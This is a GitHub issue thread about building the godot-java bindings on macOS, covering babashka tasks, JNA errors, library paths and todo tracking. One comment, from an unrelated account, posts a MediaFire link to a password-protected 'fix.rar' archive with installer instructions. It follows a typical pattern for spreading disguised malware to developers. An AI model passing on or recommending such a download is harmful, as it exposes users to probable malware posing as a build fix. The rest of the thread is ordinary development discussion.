### ISSUE TITLE
Macos build

### ISSUE THREAD

**Issue by dmg46664** [3starblaze/godot-java#1]
Hello :-)

Thought I'd start a `macos` build here https://github.com/dmg46664/godot-java/tree/macos-build

Thought I'd create this issue to go back and forward with you on it.

- [x] Builds `entry.so`.
- [ ] but not the dummy game yet.

**Comment by dmg46664** [comment]
- [ ] Wondering if you're okay for me to convert the `Makefile` to bb tasks instead? I understand that `godot-java` may be for non clojure users, but since the primary audience is Clojurists presumably we're allowed to set the tone :-)

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dmg46664** [comment]
From @3starblaze DM

> As long as there are no runtime dependency on Clojure/bb, it's fine. Once the project is more or less done, the idea is to ship the jar with the shared libraries. I picked up make because it worked. if you need some extra docs about the current state of affairs about the repo, let me know.

Just to be clear, I assume that you're aiming at the following:
1. The build phase of this project, which produces a single jar and dynamic library.
2. Then people take that jar and lib into their own game project.

Are you okay with adopting Clojurey tooling for 1 but no deps on 2? Sorry if the way I am thinking about it is wrong, but trying to work it out.

**Comment by 3starblaze** [comment]
Yes, that is right.

For the context, I initially started out with godot-clojure but I figured that since Godot heavily relies on OOP and Java is an OOP language itself I can start out by making direct mappings via godot-java and then build more ergnomic utilities as a separate library (like godot-clojure).

Since it takes little effort to make the bindings available for the entire JVM ecosystem, I'd like to keep "no Clojure during runtime" unless this approach brings significant problems.

**Comment by dmg46664** [comment]
- [x] Well I got a MacOS version to launch, 
<img width="814" alt="image" src="https://github.com/user-attachments/assets/ff6e6888-52d8-4a10-abac-37cac9afb807">

- [ ] but not run as has the following exception❗Now need to get familiar with Java classes generation. 

```
Exception in thread "main" java.lang.IllegalArgumentException: Unsupported argument type godot_java.Godot.GDStringName at parameter 0 of function native@0x10693e2d4
	at com.sun.jna.Function.convertArgument(Function.java:632)
...
	at godot_java.Godot.GodotBridge.getMethodBind(GodotBridge.java:927)
```
- [x] Didn't know that MacOS, uses `DYLD_LIBRARY_PATH` and so was knee deep in making the build flexible and exploring `-rpath`! Argh.
- [x] New build supports (could do more)
  - [x] jar file and `entry.so` built checks
  - [x] Pre running `generate-and-save-java-classes` and now `core.clj` is `bb` compatible (maybe faster?).

- Changes shouldn't affect previous Makefile (not tested as I'm on a Mac) and `bb` version for linux not configured (although not hard to do).

**Comment by 3starblaze** [comment]
My current code generator is not tested, so there are probably quite a few bugs there. About that error, looks like I am using JNA directly on the object instead of the actual address.

After being busy with other stuff, I now revisited godot-java and figured it needed some love. More precisely, I thought about:
- taming the side-effecting code a bit
- defining schemas for hash-maps I use to store info
- partially defining schema for extension_api.json (just the values I use) 
- typing most (if not all) functions via malli because
  - type-checking during testing
  - there's a way to pass that info to clj-kondo to do static analysis

Also: You can't make a game at the current stage, there aren't enough features implemented to make it possible. I think we can merge your current changes and make new issues for other problems. I have a little document where I track todos. If you want to, I can turn those into Github issues.

I have also been coding somewhat haphazardly and if you are eager to contribute more into this project, I can clean up my style. At the current stage I just tackle issues one-by-one and adapt the code if needed.

Right now I have this concept of "hookmap" lingering in the code which defines what code lines need to be inserted into initialization method (and other additions needed for a class). The main reason for its existence are hooks (some sets of functionality I want to inject) such as nativeAddress information, method-bind caching. It does feel a bit odd and I figured that I probably should just extend classmap (a map that defines a java class) for this.

**Comment by dmg46664** [comment]
Thanks for your response :-)
I can't help myself but first try optimise my development loop & therefore build before I get stuck in.
I thought it easier to show you what I had in mind than describe it first.

I didn't want to presume you'd be happy with a PR without seeing what I had in mind. Happy to create a PR now that you are giving the nod. The code was 2 commits behind when I got that error. Hopefully you're okay with a squash commit strategy.

Please don't yet create a bunch of issues (work) yet. Perhaps let me continue to have a play and ask a bunch of questions first. I see you used a `.org` file format on `godot-clojure` so I presume an Emacs user? In which case I suggest just committing the document to the Repo and pealing issues off as needed.

**Comment by 3starblaze** [comment]
Yes, I track todos and other info about this project in an org-file. Tomorrow I'll clean up the file a bit and push it to repo.
